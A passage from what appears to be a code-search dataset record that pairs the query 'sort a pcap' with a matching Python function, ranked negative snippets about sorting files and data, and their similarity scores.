shutil.copyfile(os.path.join(\"data\", f), os.path.join(x_train_dir, f))\n\n for f in train_y:\n shutil.copyfile(os.path.join(\"data\", f), os.path.join(y_train_dir, f))\n\n for f in valid_x:\n shutil.copyfile(os.path.join(\"data\", f), os.path.join(x_valid_dir, f))\n\n for f in valid_y:\n shutil.copyfile(os.path.join(\"data\", f), os.path.join(y_valid_dir, f))", "def merge_sort(alist):\n print(\"Splitting \", alist)\n # Temporary list to store sorted list\n work = [None] * len(alist)\n rec_merge_sort(work, start=0, end=len(alist)-1)", "def merge_files(\n files: List[TextIOWrapper],\n ) -> Generator[Tuple[List[TextIOWrapper]], str, None]:\n\n result = []\n\n for index, file in enumerate(files):\n try:\n iterator = iter(file)\n value = next(iterator)\n\n heapq.heappush(\n result, ((sorting_key(value), index, value, iterator, file))\n )\n except StopIteration:\n file.close()\n\n previous = None\n comment_count = 0\n max_comment_count = 2\n\n while result:\n ignore = False\n\n _, index, value, iterator, file = heapq.heappop(result)\n\n if remove_duplicates and value == previous:\n ignore = True\n\n if (\n write_header\n and comment_count < max_comment_count\n and value[0] == \"#\"\n ):\n ignore = True\n max_comment_count += 1\n\n if not ignore:\n yield value\n previous = value\n\n try:\n value = next(iterator)\n\n heapq.heappush(\n result, ((sorting_key(value), index, value, iterator, file))\n )\n except StopIteration:\n file.close()", "def sort_variants(infile, mode='chromosome'):\n command = [\n 'sort',\n ]\n if mode == 'chromosome':\n command.append('-n')\n command.append('-k1')\n command.append('-k3')\n\n elif mode == 'rank':\n command.append('-rn')\n command.append('-k1')\n\n command = command + [infile, '-o', infile]\n\n logger.info(\"Start sorting variants...\")\n logger.info(\"Sort command: {0}\".format(' '.join(command)))\n sort_start = datetime.now()\n \n try:\n call(command)\n except OSError as e:\n logger.warning(\"unix program 'sort' does not seem to exist on your system...\")\n logger.warning(\"genmod needs unix sort to provide a sorted output.\")\n logger.warning(\"Output VCF will not be sorted since genmod can not find\"\\\n \"unix sort\")\n raise e\n\n logger.info(\"Sorting done. Time to sort: {0}\".format(datetime.now()-sort_start))\n \n return", "def shell_sort(a_list):\n \n start_time = time.time()\n\n sublist_count = len(a_list) // 2\n while sublist_count > 0:\n for start_position in range(sublist_count):\n gap_insertion_sort(a_list, start_position, sublist_count)\n\n sublist_count = sublist_count // 2\n\n end_time = time.time()\n\n run_time = end_time - start_time\n\n return (run_time, a_list)", "def csvs_scattered_to_grouped(path_dir, inlist, outlist, gcols,\n sort=1, scols=None, catalog=\"\", supersede=False):\n\n filelist=[os.path.join(path_dir,i) for i in inlist]\n n_split=len(outlist)\n\n pdfs=pd.read_csv(filelist[0],usecols=gcols)\n pdfs.drop_duplicates(inplace=True)\n\n print(\"csvs_scattered_to_grouped: Collecting items for group.\\n\")\n for i in range(1,len(filelist)):\n pdfs=pdfs.append(pd.read_csv(filelist[i],usecols=gcols),ignore_index=True)\n pdfs.drop_duplicates(inplace=True)\n\n if sort==1:\n pdfs.sort_values(gcols,inplace=True, ascending=True)\n elif sort==-1:\n pdfs.sort_values(gcols,inplace=True, ascending=False)\n\n aa_ed=np.array_split(pdfs, n_split)\n\n if supersede:\n for i in outlist:\n if os.path.isfile(os.path.join(path_dir,i)):\n os.remove(os.path.join(path_dir,i))\n if os.path.isfile(os.path.join(path_dir,str(catalog))):\n os.remove(os.path.join(path_dir,str(catalog)))\n\n print(\"csvs_scattered_to_grouped: Start processing files:\\n\")\n for i in range(0,len(filelist)):\n fi=pd.read_csv(filelist[i],usecols=scols)\n for j,ja in enumerate(aa_ed):\n wrtj=pd.merge(ja, fi, how='inner', on=gcols)\n append_to_csv(wrtj, os.path.join(path_dir,outlist[j]))\n print('csvs_scattered_to_grouped: '+str(i)+' file(s) finished.')\n\n if catalog:\n for i, d in enumerate(aa_ed):\n d['_@_FILE_']=outlist[i]\n append_to_csv(d, os.path.join(path_dir,str(catalog)))\n print('csvs_scattered_to_grouped: Catalog file created.')", "def sort_and_save_test(data, type_data, id_data, N_max, n_per_conn, path):\n\n sizes = (N_max*n_per_conn - np.isnan(data).sum(axis=1)) // n_per_conn\n\n # get sorted indices\n sorted_indices = np.argsort(sizes)\n\n # sort\n data = data[sorted_indices]\n sizes = sizes[sorted_indices]\n type_data = type_data[sorted_indices]\n id_data = id_data[sorted_indices]\n\n # counter variable\n i = 0\n\n data_ = []\n type_ = []\n id_ = []\n\n # loop over sizes\n for size in range(1, N_max+1):\n data_list = []\n type_list = []\n id_list = []\n\n while i < len(data) and size == sizes[i]:\n data_list.append(data[i, 0:(size*n_per_conn)])\n type_list.append(type_data[i, 0:size].astype(int))\n id_list.append(id_data[i, 0:size].astype(int))\n i += 1\n\n if len(data_list) > 1:\n data_.append(torch.tensor(np.vstack(data_list),\n dtype=torch.float32))\n type_.append(torch.from_numpy(np.vstack(type_list)))\n id_.append(torch.from_numpy(np.vstack(id_list)))\n elif len(data_list) == 1:\n data_.append(torch.from_numpy(data_list[0], dtype=torch.float32))\n type_.append(torch.from_numpy(type_list[0]))\n id_.append(torch.from_numpy(id_list[0]))\n else:\n continue\n\n torch.save(data_, os.path.join(path, 'test.pt'))\n torch.save(type_, os.path.join(path, 'test_type.pt'))\n torch.save(id_, os.path.join(path, 'id.pt'))", "def sort_inventory(self, inventory_list): # dont use transactions here...as it is called within other transactions\n # unused will be deprecated\n batch_list = []\n new_inventory_list = []\n try:\n for i in inventory_list:\n if i.batch_number:\n batch_list.append(i.batch_number)\n batch_list.sort()\n for i in batch_list:\n for j in inventory_list:\n if j.batch_number == i:\n new_inventory_list.append(j)\n return new_inventory_list\n except Exception:\n if settings.level == 10:\n logger.exception('raised exception')\n return new_inventory_list", "def sort_files(filenames, ref_hashes):\n filenames = [f for f in filenames if 'glog.xml' in f]\n hashes = [f.split(os.sep)[-2] for f in filenames]\n idx = [hashes.index(h) for i, h in enumerate(ref_hashes)]\n filenames = [filenames[i] for i in idx]\n return filenames", "def flist(file_pattern, *sorted_args, **sorted_kwargs):\n files = glob.glob(file_pattern)\n return sorted(files, *sorted_args, **sorted_kwargs)", "def sort():\n return -1", "def test_multi_template():\n data = []\n data.extend([\"{}_data.json\".format(i) for i in range(50)])\n data.extend([\"{}_log.csv\".format(i) for i in range(50)])\n data.extend([\"filename_{}.py\".format(i) for i in range(50)])\n data.extend([\"stuff_{}.py\".format(i) for i in range(50)])\n temp = data[:]\n random.shuffle(temp)\n assert data == sort(temp)", "def sort(self):\n for _ in self.stage1():\n yield\n for _ in self.stage2():\n yield", "def merge_sort(items):\r\n # TODO: Check if list is so small it's already sorted (base case)\r\n # TODO: Split items list into approximately equal halves\r\n # TODO: Sort each half by recursively calling merge sort\r\n # TODO: Merge sorted halves into one list in sorted order\r", "def sort(self):\n\n img_files = os.listdir(self.path)\n\n img_list = {}\n\n for img_file in img_files:\n filename = os.path.join(self.path, img_file)\n\n try:\n img = Image.open(filename)\n except:\n continue\n\n print \"Analyzing %s\" % img_file\n\n points = self.points(img.size[0], img.size[1])\n key = \"\"\n for point in points:\n\n # Get the average color for each point\n ave_points = self.diamond_points(point[0], point[1])\n red = 0\n green = 0\n blue = 0\n for ave_point in ave_points:\n try:\n rgb = img.getpixel(ave_point)\n red += rgb[0]\n green += rgb[1]\n blue += rgb[2]\n except IndexError:\n pass\n red /= len(ave_points)\n green /= len(ave_points)\n blue /= len(ave_points)\n\n # Bitdepths:\n # 12 bit - 4096 colors, range 0-F, divide by 16\n # 9 bit - 512 colors, range 0-7, divide by 32\n # 6 bit - 64 colors, range 0-3, divide by 64\n # 3 bit - 8 colors, range 0-1, divide by 128\n\n if self.num_colors == 8:\n div = 128\n elif self.num_colors == 64:\n div = 64\n elif self.num_colors == 512:\n div = 32\n elif self.num_colors == 4096:\n div = 16\n else:\n self.usage()\n\n # Lower the bitdepth\n red = int(red / div)\n green = int(green / div)\n blue = int(blue / div)\n\n # Add to the key\n key += \"%x%x%x\" % (red, green, blue)\n\n # Add the key if needed\n if key not in img_list:\n img_list[key] = []\n\n # Add the file to the list\n img_list[key].append(img_file)\n\n # Go through and rename the files, based on the img_list dictionary\n # and the prefix\n num = 1\n for img in sorted(img_list.iterkeys()):\n for filename in sorted(img_list[img]):\n name, ext = os.path.splitext(filename)\n new_filename = \"%s%04d%s\" % (self.prefix, num, ext)\n full_filename = os.path.join(self.path, filename)\n full_new_filename = os.path.join(self.path, new_filename)\n if os.path.isfile(full_new_filename):\n print \"File %s exists - aborting!\" % full_new_filename\n return\n\n os.rename(full_filename, full_new_filename)\n print \"Renamed %s to %s.\" % (filename, new_filename)\n num += 1", "def sorting_alg(self, my_list):\n for i in range(len(my_list)):\n for j in range(i+1, len(my_list)):\n if my_list[i] > my_list[j]:\n my_list[i], my_list[j] = my_list[j], my_list[i]\n #print(my_list)\n #sleep(1)\n return my_list", "def sort(data,start,end):\n if start < end:\n partition_index=partition(data,start,end)\n sort(data,start,partition_index-1)\n sort(data,partition_index+1,end)", "def sortLoadFiles(self):\n self.loadFiles.sort()\n self.loadFiles.sort(lambda a,b: cmp(a[-3:].lower(), b[-3:].lower()))", "def merge_quick_sort(L):\n list1 = []\n list2 = []\n (evens, odds) = merge_sort.split(L)\n list1 += quick_sort.quick_sort(evens)\n list2 += quick_sort.quick_sort(odds)\n x = merge_sort.merge(list1,list2)\n return x", "def main(args):\n\tunsorted_array = []\n\n\tif args.order == 'ASC':\n\t\tunsorted_array = list(range(0, int(args.instancesize)))\n\n\tif args.order == 'DESC':\n\t\tunsorted_array = list(range(0, int(args.instancesize)))\n\t\tunsorted_array = list(reversed(unsorted_array))\n\n\tif args.order == 'RAND':\n\t\tunsorted_array = list(range(0, int(args.instancesize)))\n\t\tnp.random.shuffle(unsorted_array)\n\n\tsize = int(args.instancesize)\n\n\tif args.algorithm == 'all':\n\t\tselection_sort(unsorted_array, size)\n\t\tinsertion_sort(unsorted_array, size)\n\t\tshell_sort(unsorted_array, size)\n\t\tmerge_sort(unsorted_array, size)\n\t\theap_sort(unsorted_array, size)\n\t\tquick_sort(unsorted_array, size)\n\n\tif args.algorithm == 'selection':\n\t\tselection_sort(unsorted_array, size)\n\n\tif args.algorithm == 'insertion':\n\t\tinsertion_sort(unsorted_array, size)\n\n\tif args.algorithm == 'shell':\n\t\tshell_sort(unsorted_array, size)\n\n\tif args.algorithm == 'merge':\n\t\tmerge_sort(unsorted_array, size)\n\n\tif args.algorithm == 'heap':\n\t\theap_sort(unsorted_array, size)\n\n\tif args.algorithm == 'quick':\n\t\tquick_sort(unsorted_array, size)", "def shell_sort(l):\n\tdef __updated_h(h):\n\t\th = int(h / 3)\n\t\t\n\tdef __max_h(h):\n\t\twhile h < int(len(l) / 3):\n\t\t\th = 3 * h + 1\n\t\treturn h\n\n\th = __max_h()\n\t\n\twhile h >= 1:\n\n\t\t# h-sort the array\n\t\tfor i in range(h, len(l)):\n\t\t\tfor j in range(i, h, -h):\n\t\t\t\tif l[j] < l[j - h]:\n\t\t\t\t\t__swap(l, j, j-h)\n\t\t\t\telse:\n\t\t\t\t\tbreak\n\n\t\th = __updated_h(h)", "def sort_all(batch, lens):\n\n unsorted_all = [lens] + [range(len(lens))] + list(batch)\n sorted_all = [list(t) for t in zip(*sorted(zip(*unsorted_all), reverse=True))]\n return sorted_all[2:], sorted_all[1]", "def sort_all(batch, lens):\r\n unsorted_all = [lens] + [range(len(lens))] + list(batch)\r\n sorted_all = [list(t) for t in zip(*sorted(zip(*unsorted_all), reverse=True))]\r\n return sorted_all[2:], sorted_all[1]", "def main():\n extension_to_category = {}\n # Change to FileToSort directory\n os.chdir(\"FilesToSort\")\n\n # Loop through each file in the (current) directory\n for filename in os.listdir('.'):\n # Ignore directories, just process files\n if os.path.isdir(filename):\n continue\n\n extension = filename.split(\".\")[-1]\n if extension not in extension_to_category:\n category = input(\"What category would you like to sort {} files into?\".format(extension))\n extension_to_category[extension] = category\n print(extension_to_category.items())\n # In case user put in existing folder\n try:\n os.mkdir(category)\n except FileExistsError:\n pass\n\n # Move files to directories based on categories by renaming\n os.rename(filename, \"{}/{}\".format(extension_to_category[extension], filename))", "def test_pyt_batchsort_train(self):\n # Next, check that training works\n dt_and_preprocess = [\n ('train', False),\n ('train:stream', False),\n ('train', True)\n ]\n for dt, preprocess in dt_and_preprocess:\n defaults = parser_defaults.copy()\n defaults['datatype'] = dt\n defaults['pytorch_preprocess'] = preprocess\n defaults['pytorch_teacher_batch_sort'] = True\n defaults['batchsize'] = 32\n if preprocess:\n defaults['batch_sort_field'] = 'text_vec'\n str_output, _, _ = testing_utils.train_model(defaults)\n self.assertTrue(\n solved_task(str_output),\n 'Teacher could not teach seq2seq with batch sort '\n 'and args {} and output {}'\n .format((dt, preprocess), str_output)\n )", "def sort_file(file_path):\n sorted_handle, tmp_path = tempfile.mkstemp(prefix='gzipi')\n os.close(sorted_handle)\n shutil.move(file_path, tmp_path)\n\n #\n # We use sort from GNU toolchain here, because index file can be pretty big.\n #\n sort_flags = [\n '--field-separator=|',\n '--key=1,1',\n '--parallel=%s' % _SORT_CPU_COUNT,\n '--buffer-size=%s' % _SORT_BUFFER_SIZE\n ]\n gzcat = plumbum.local[get_exe('gzcat', 'zcat')][tmp_path]\n cat = plumbum.local['cat'][tmp_path]\n gzip_exe = plumbum.local['gzip']['--stdout']\n sort = plumbum.local[get_exe('gsort', 'sort')][sort_flags]\n\n file_path = os.path.abspath(file_path)\n is_gzipped = file_path.endswith('.gz')\n\n with plumbum.local.env(LC_ALL='C'):\n try:\n if is_gzipped:\n return ((gzcat | sort | gzip_exe) > file_path) & plumbum.FG\n else:\n return ((cat | sort) > file_path)()\n finally:\n os.remove(tmp_path)", "def quick_sort(lst, first, last):\r\n if first < last:\r\n split_marker = split_list(lst, first, last)\r\n\r\n quick_sort(lst, split_marker + 1, last)\r\n quick_sort(lst, first, split_marker - 1)", "def sort(data, sort_size=500):\n\n buf = []\n for sample in data:\n buf.append(sample)\n if len(buf) >= sort_size:\n buf.sort(key=lambda x: x[\"feat\"].size(0))\n for x in buf:\n yield x\n buf = []\n # The sample left over\n buf.sort(key=lambda x: x[\"feat\"].size(0))\n for x in buf:\n yield x", "def sort(self):\n \n ct=[]\n rt=[]\n wr=[]\n # search for tags that aren't in the right position\n for i in range(len(self.contigs)):\n c = self.contigs[i]\n if c.wa:\n if not self.wa:\n self.wa=[]\n self.wa.extend(c.wa)\n if c.ct:\n newcts=[ct_tag for ct_tag in c.ct if ct_tag.name!=c.name]\n map(self.contigs[i].ct.remove,newcts)\n ct.extend(newcts)\n for j in range(len(c.reads)):\n r = c.reads[j]\n if r.rt:\n newrts=[rt_tag for rt_tag in r.rt if rt_tag.name!=r.rd.name]\n map(self.contigs[i].reads[j].rt.remove,newrts)\n rt.extend(newrts)\n if r.wr:\n newwrs=[wr_tag for wr_tag in r.wr if wr_tag.name!=r.rd.name]\n map(self.contigs[i].reads[j].wr.remove,newwrs)\n wr.extend(newwrs)\n # now sort them into their proper place\n for i in range(len(self.contigs)):\n c = self.contigs[i]\n for ct_tag in ct:\n if ct_tag.name==c.name:\n if self.contigs[i].ct is None:\n self.contigs[i].ct=[]\n self.contigs[i].ct.append(ct_tag)\n if rt or wr:\n for j in range(len(c.reads)):\n r = c.reads[j]\n for rt_tag in rt:\n if rt_tag.name==r.rd.name:\n if self.contigs[i].reads[j].rt is None:\n self.contigs[i].reads[j].rt=[]\n self.contigs[i].reads[j].rt.append(rt_tag)\n for wr_tag in wr:\n if wr_tag.name==r.rd.name:\n if self.contigs[i].reads[j].wr is None:\n self.contigs[i].reads[j].wr=[]\n self.contigs[i].reads[j].wr.append(wr_tag)", "def cleanup(job, tempOutputFileStoreID, outputFile, cores=1, memory=sortMemory, disk=\"3G\"):\n fileName = job.fileStore.readGlobalFile(tempOutputFileStoreID)\n shutil.copyfile(fileName, outputFile)\n job.fileStore.logToMaster(\"Finished copying sorted file to output: %s\" % outputFile)", "def sort_1(l):\n pass", "def intro_sort(data):\n recurssion_depth=2*math.log(len(data))\n if len(data) < 15:\n insertion_sort(data)\n elif recurssion_depth==0:\n merge_sort(data)\n else:\n quick_sort(data)", "def write_sorting(sorting, save_path):\n assert HAVE_SBEX, SHYBRIDSortingExtractor.installation_mesg\n dump = np.empty((0, 2))\n\n for unit_id in sorting.get_unit_ids():\n spikes = sorting.get_unit_spike_train(unit_id)[:, np.newaxis]\n expanded_id = (np.ones(spikes.size) * unit_id)[:, np.newaxis]\n tmp_concat = np.concatenate((expanded_id, spikes), axis=1)\n\n dump = np.concatenate((dump, tmp_concat), axis=0)\n\n sorting_fn = os.path.join(save_path, 'initial_sorting.csv')\n np.savetxt(sorting_fn, dump, delimiter=',', fmt='%i')", "def sort(self): # sort all entries to make room for new ones, determine best and worst\n ns = self.num_stored.value\n ys = np.asarray(self.ys[:ns])\n yi = ys.argsort()\n sortRuns = []\n for i in range(len(yi)):\n y = ys[yi[i]]\n xs = self.get_x(yi[i])\n sortRuns.append((y, xs))\n numStored = min(len(sortRuns),int(0.9*self.capacity)) # keep 90% best \n for i in range(numStored):\n self.replace(i, sortRuns[i][0], sortRuns[i][1])\n self.num_sorted.value = numStored \n self.num_stored.value = numStored \n return numStored", "def hxlsort():\n run_script(hxlsort_main)", "def sortFiles(files):\n def sortKey(file):\n dirFile = file.lower().rsplit('\\\\',1)\n if len(dirFile) == 1: dirFile.insert(0,'')\n return dirFile\n sortKeys = dict((x,sortKey(x)) for x in files)\n return sorted(files,key=lambda x: sortKeys[x])", "def quick_sort(items):\n if len(items) &gt; 1:\n pivot_index = len(items) / 2\n smaller_items = []\n larger_items = []\n \n for i, val in enumerate(items):\n if i != pivot_index:\n if val &lt; items[pivot_index]:\n smaller_items.append(val)\n else:\n larger_items.append(val)\n \n quick_sort(smaller_items)\n quick_sort(larger_items)\n items[:] = smaller_items + [items[pivot_index]] + larger_items", "def sort_bam(self, bam_in, bam_sorted_out):\n self.cmd(\"{picard_cmd}/SortSam.jar\\\n INPUT='{bam_in}'\\\n OUTPUT='{bam_sorted_out}'\\\n SORT_ORDER=coordinate CREATE_MD5_FILE=false\\\n CREATE_INDEX=false MAX_RECORDS_IN_RAM=5000000\\\n VALIDATION_STRINGENCY=LENIENT\\\n QUIET=false COMPRESSION_LEVEL=5 TMP_DIR='{local_temp_dir}'\"\n .format(\n picard_cmd=self.cmds[\"picard\"],\n bam_in=bam_in,\n bam_sorted_out=bam_sorted_out,\n local_temp_dir=self.local_temp_dir,\n ),\n on_error=lambda: self.create_error_file(bam_sorted_out),\n shell=True)\n if self.remove_intermediate:\n self.rm(bam_in)", "def sort(leg=True, reportsDir = \"./reports/\"):\n if leg:\n directory = reportsDir + \"leg/\"\n else:\n directory = reportsDir + \"mal/\"\n\n dirFiles = glob.glob(directory+\"*.json\")\n num, broken = 0, 0\n\n for i, f in enumerate(dirFiles):\n try:\n if numProcs(f) == 1:\n if isThereApiCalls(f):\n num += 1\n move(f, directory + \"oneproc\")\n else:\n broken += 1\n move(f, directory + \"broken/\")\n elif not isThereApiCalls(f):\n broken += 1\n move(f, directory + \"broken/\")\n except KeyError:\n move(f, directory + \"broken/\")\n broken += 1\n cls()\n print(\"Filename: \", f)\n print(\"Progress: {0}/{1}. One process files: {2}. Broken: {3}\".format(i, len(dirFiles), num, broken))" ]
[ "0.72347873", "0.69368804", "0.66853625", "0.66780645", "0.6673519", "0.65403235", "0.6349198", "0.61560905", "0.60991603", "0.6048404", "0.60408694", "0.60184044", "0.6008325", "0.59858507", "0.59529555", "0.5915996", "0.5901437", "0.59011704", "0.58594245", "0.5847667", "0.5809564", "0.58032763", "0.5802787", "0.5792274", "0.5777833", "0.57763976", "0.57625294", "0.5745039", "0.5744863", "0.57415825", "0.572754", "0.5722941", "0.5722214", "0.57209635", "0.57094264", "0.57038283", "0.56962544", "0.569602", "0.5691955", "0.56910926", "0.56831694", "0.56747", "0.5648224", "0.56449723", "0.56015253", "0.5573914", "0.55713767", "0.5569842", "0.55439943", "0.55387634", "0.5524626", "0.5523936", "0.5518929", "0.55157787", "0.55082554", "0.54918957", "0.54866034", "0.54861027", "0.54860187", "0.5485201", "0.548011", "0.54798746", "0.54784054", "0.5477", "0.54765904", "0.5475684", "0.5474327", "0.54716283", "0.5461002", "0.54593456", "0.54585177", "0.54486006", "0.5447849", "0.54414135", "0.5441404", "0.5431145", "0.5429048", "0.5421495", "0.54196155", "0.54191345", "0.54164493", "0.5403593", "0.5402502", "0.5395178", "0.53946364", "0.53943264", "0.53874576", "0.5387225", "0.5378769", "0.53761345", "0.53750604", "0.5374769", "0.537475", "0.5353128", "0.53529346", "0.53444797", "0.5342736", "0.5341477", "0.53342456", "0.5333347" ]
0.68566626
2
Use SortCap class together with batch_sort to sort a pcap
def sort_pcap(inpath, outpath): inc = SortCap(inpath) batch_sort(inc, outpath, output_class=lambda path: WriteCap(path, linktype=inc.linktype)) return 0
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def external_sort(input_file_name, block_size, output_file_name=None):\n if output_file_name is None:\n output_file_name = input_file_name\n sorter = ExternalSort(input_file_name, block_size, output_file_name)\n sorter.run()", "def step020():\n logger.logMessage('Begin: Sorting records')\n sortCommand = 'sort {0} -t \\';\\' --key 2 -o {1}'.format(candidatesFile,sortedCandidatesFile) \n rc = os.system(sortCommand)\n if rc != 0:\n raise Exception('Error returned by sort program: {0:d}'.format(rc))\n logger.logMessage('End : Sorting records')", "def f_way_sort(buffer_size: int, input_paths: list, output_path: str):\n pass", "def volume_sort(self):\n self.jobs_sorted = sorted(\n self.jobs,\n key=lambda job: (job['height'], job['width'] * job['height']),\n # key=lambda job: job['width'] * job['height'],\n reverse=True)", "def batchSort(input, output, key, buffer_size, tempdir):\n def merge(key=None, *iterables):\n if key is None:\n keyed_iterables = iterables\n else:\n Keyed = namedtuple(\"Keyed\", [\"key\", \"obj\"])\n keyed_iterables = [(Keyed(key(obj), obj) for obj in iterable)\n for iterable in iterables]\n for element in heapq.merge(*keyed_iterables):\n yield element.obj\n\n tempdir = os.path.join(tempdir, str(uuid.uuid4()))\n os.makedirs(tempdir)\n chunks = []\n try:\n with open(input, 'rb', 64 * 1024) as inputFile:\n inputIter = iter(inputFile)\n while True:\n current_chunk = list(islice(inputIter, buffer_size))\n if not current_chunk:\n break\n current_chunk.sort(key=key)\n output_chunk = open(\n os.path.join(tempdir, '%06i' % len(chunks)), 'w+b',\n 64 * 1024)\n chunks.append(output_chunk)\n output_chunk.writelines(current_chunk)\n output_chunk.flush()\n output_chunk.seek(0)\n with open(output, 'wb', 64 * 1024) as output_file:\n output_file.writelines(merge(key, *chunks))\n finally:\n for chunk in chunks:\n try:\n chunk.close()\n os.remove(chunk.name)\n except Exception:\n pass\n print(\"sorted file %s ready\" % (output))", "def sort_grouped_packets(self, grouped_packets):\n for group in grouped_packets:\n group.sort(key=lambda x: x.time, reverse=False)\n return grouped_packets", "def testSorting(self):\n mtt.makeTempDirParent()\n shuffledTargets = list(g_targetBlocks)\n for i in xrange(0, 200):\n tmpDir = os.path.abspath(mtt.makeTempDir('sorting'))\n random.shuffle(g_nonTargetBlocks)\n random.shuffle(shuffledTargets)\n shuffledBlocks = list(shuffledTargets)\n lower = 0\n for j in xrange(0, len(g_nonTargetBlocks)):\n # randomly insert the non target blocks, but keep a record\n # of their relative order.\n index = random.randint(lower, len(shuffledBlocks))\n shuffledBlocks.insert(index, g_nonTargetBlocks[j])\n lower = index + 1\n testMaf = mtt.testFile(os.path.abspath(os.path.join(tmpDir, 'test.maf')), \n ''.join(shuffledBlocks), g_headers)\n parent = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n cmd = [os.path.abspath(os.path.join(parent, 'test', 'mafSorter'))]\n cmd += ['--maf', os.path.abspath(os.path.join(tmpDir, 'test.maf')), \n '--seq', 'hg18.chr7']\n outpipes = [os.path.abspath(os.path.join(tmpDir, 'sorted.maf'))]\n mtt.recordCommands([cmd], tmpDir, outPipes=outpipes)\n mtt.runCommandsS([cmd], tmpDir, outPipes=outpipes)\n self.assertTrue(mafIsSorted(os.path.join(tmpDir, 'sorted.maf')))\n mtt.removeDir(tmpDir)", "def sort(data, sort_size=500):\n\n buf = []\n for sample in data:\n buf.append(sample)\n if len(buf) >= sort_size:\n buf.sort(key=lambda x: x[\"feat\"].size(0))\n for x in buf:\n yield x\n buf = []\n # The sample left over\n buf.sort(key=lambda x: x[\"feat\"].size(0))\n for x in buf:\n yield x", "def test_benchmark_sorted(benchmark, benchmark_items_fixture):\n do_benchmark(benchmark_items_fixture, sorted, benchmark)", "def array_sort():\n to_concat = []\n for centroid_rgb, cluster in itertools.izip(centroids_rgb, self.clusters):\n # no need to revisit ratio\n new_idxed_arr = tf.concat(1,[tf.slice(cluster, [0,0], [-1,2]),\n tf.tile(tf.expand_dims(\n tf.constant(centroid_rgb), 0),\n multiples=[len(cluster.eval()), 1])])\n to_concat.append(new_idxed_arr)\n\n concated = tf.concat(0, to_concat)\n sorted_arr = np.array(sorted(concated.eval().tolist()), dtype=np.uint8)[:, 2:]\n\n new_img = Image.fromarray(sorted_arr.reshape([self.m, self.n, self.chann]))\n if save:\n new_img.save(outfile, format=format_)\n os.popen(\"open '{}'\".format(outfile))\n else:\n new_img.show()", "def sort(self):\n self.deckcards.sort()", "def sort(self):\n\t\tself.servers = sorted(self.servers, key=lambda s: s.load)\n\t\tself.servers = sorted(self.servers, key=lambda s: s.distance_class)\n\t\tself.servers = sorted(self.servers, key=lambda s: s.country == self.locale_info.country, reverse=True)", "def custom_sort(arr):\n pass", "def sortby(self):\n ...", "def batch_sort(input_iterator, output_path, buffer_size=1024**2, output_class=None):\n if not output_class:\n output_class = input_iterator.__class__\n\n chunks = []\n try:\n while True:\n current_chunk = list(islice(input_iterator,buffer_size))\n if not current_chunk:\n break\n current_chunk.sort()\n output_chunk_name = os.path.join(TMPD, \"%06i\" % len(chunks))\n output_chunk = output_class(output_chunk_name)\n\n for elem in current_chunk:\n output_chunk.write(elem.obj)\n output_chunk.close()\n chunks.append(input_iterator.__class__(output_chunk_name))\n\n output_file = output_class(output_path)\n for elem in heapq.merge(*chunks):\n output_file.write(elem.obj)\n output_file.close()\n except:\n raise\n finally:\n for chunk in chunks:\n try:\n chunk.close()\n os.remove(chunk.name)\n except Exception:\n pass", "def oldsortslice(self):\n ...", "def test_list_vips_sort(self):\n resources = \"vips\"\n cmd = vip.ListVip(test_cli20.MyApp(sys.stdout), None)\n self._test_list_resources(resources, cmd,\n sort_key=[\"name\", \"id\"],\n sort_dir=[\"asc\", \"desc\"])", "def sort(self):\r\n\t\treturn sorted(self.sample)", "def __sort_by_priority(self, input_list):\n print(\"========================Start of __sort_by_priority() Method *\")\n # temp1 = input_list.sort(key=operator.attrgetter(\"submission_time\"))\n # temp1 = temp1.sort(key=operator.attrgetter(str(\"__req_start\")))\n\n # sending one item from list at a time to be enqueued ensuring sorted-nes\n for j in range(len(input_list)):\n self.current_queue.enqueue(input_list[j])\n # print(\"Enqueued the FF item from Input list :\" + input_list[j].showFlightInfo())\n # print(\"*De-queued the FF item from Queue :\" + self.current_queue.dequeue(j).showFlightInfo())\n \"\"\"\n if input_list[i].get_reqStart <= self.current_queue.first.get_reqStart:\n if input_list[i].get_submissionTime <= self.current_queue.first.get_submissionTime:\n temp = self.current_queue.first\n self.current_queue.first = input_list[i]\n self.current_queue.first.next = temp\"\"\"\n print(\"========================End of __sort_by_priority() Method *\")", "def sort_reads(self): \n if not self.sampling:\n self.convert_to_array()\n self.reads = self.reads[self.reads[:,0].argsort()]", "def test_list_vips_sort(self):\r\n resources = \"vips\"\r\n cmd = vip.ListVip(test_cli20.MyApp(sys.stdout), None)\r\n self._test_list_resources(resources, cmd,\r\n sort_key=[\"name\", \"id\"],\r\n sort_dir=[\"asc\", \"desc\"])", "def sort(self):\r\n return self.sort_targets([self])", "def sort(self):\n self.cards.sort()", "def sort(self):\n self.cards.sort()", "def order_test(self, attack_args, seed=None, cleanup=True, pcap=Lib.test_pcap,\n flag_write_file=False, flag_recalculate_stats=False, flag_print_statistics=False,\n attack_sub_dir=True, test_sub_dir=True):\n\n controller = Ctrl.Controller(pcap_file_path=pcap, do_extra_tests=False, non_verbose=True)\n controller.load_pcap_statistics(flag_write_file, flag_recalculate_stats, flag_print_statistics,\n intervals=[], delete=True)\n controller.process_attacks(attack_args, [[seed]])\n\n caller_function = inspect.stack()[1].function\n\n try:\n path = controller.pcap_dest_path\n file = pcr.RawPcapReader(path)\n packet_a = file.read_packet()\n packet_b = file.read_packet()\n i = 0\n\n while packet_b is not None:\n\n time_a = [packet_a[1].sec, packet_a[1].usec]\n time_b = [packet_b[1].sec, packet_b[1].usec]\n\n if time_a[0] > time_b[0]:\n file.close()\n self.fail(\"Packet order incorrect at: \" + str(i + 1) + \"-\" + str(i + 2) +\n \". Current time: \" + str(time_a) + \" Next time: \" + str(time_b))\n elif time_a[0] == time_b[0]:\n if time_a[1] > time_b[1]:\n file.close()\n self.fail(\"Packet order incorrect at: \" + str(i + 1) + \"-\" + str(i + 2) +\n \". Current time: \" + str(time_a) + \" Next time: \" + str(time_b))\n\n packet_a = packet_b\n packet_b = file.read_packet()\n i += 1\n\n file.close()\n\n except self.failureException:\n Lib.rename_test_result_files(controller, caller_function, attack_sub_dir, test_sub_dir)\n raise\n\n if cleanup:\n Lib.clean_up(controller)\n else:\n Lib.rename_test_result_files(controller, caller_function, attack_sub_dir, test_sub_dir)", "def keysort(*args, **kwargs): # real signature unknown\n pass", "def process_pcap(pcap):\n\n print \"Processing\", pcap\n pcap_path, _ = os.path.splitext(pcap)\n # strip_payload_from_pcap(pcap)\n os.system(\"tshark -nn -T fields -E separator=/t -e frame.time_epoch\"\n \" -e ip.src -e ip.dst -e tcp.srcport 